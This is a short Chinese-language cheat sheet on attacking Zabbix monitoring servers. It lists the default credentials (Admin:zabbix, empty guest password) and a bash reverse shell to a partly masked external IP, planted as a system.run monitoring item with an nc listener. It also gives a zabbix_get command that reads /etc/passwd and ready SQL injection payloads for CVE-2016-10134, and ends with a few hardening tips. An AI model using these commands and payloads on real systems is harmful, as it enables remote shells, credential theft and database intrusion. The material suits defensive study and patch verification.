常见运维漏洞-Zabbix漏洞
zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。 zabbix能监视各种网络参数,保证服务器系统的安全运营; 并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。
Zabbix配置不当安全事件
sohu的zabbix,可导致内网渗透 http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0127627
京东某站shell直入jae内网物理机内核版本过低 http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-086349
Zabbix弱口令利用
zabbix默认的口令为Admin:zabbix,以及存在guest密码为空 Zabbix server可以远程在agent的机器上执行任意命令 建立监控项 zabbix_get命令调用
system.run[command,<mode>]
这个模块是agent自带的,获取服务器shell,获取root权限。 监控项:
bash -i >& /dev/tcp/45.xx.xxx.x1/6666 0>&1
nc -lvp 6666
zabbix_get命令调用:
zabbix_get -s 172.18.0.4 -k 'system.run[cat /etc/passwd]'
Zabbix 注入利用
latest.php SQL注入漏洞(CVE-2016-10134)
Payload: latest.php?output=ajax&sid=055e1ffa36164a58&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)
jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)
Zabbix攻击方法
默认口令 注入漏洞 BurpSuite爆破口令
•修复建议
•不要放外网 •修改默认密码 •禁用guest用户 •不要以root启动 •401认证 •备份数据 -> 升级版本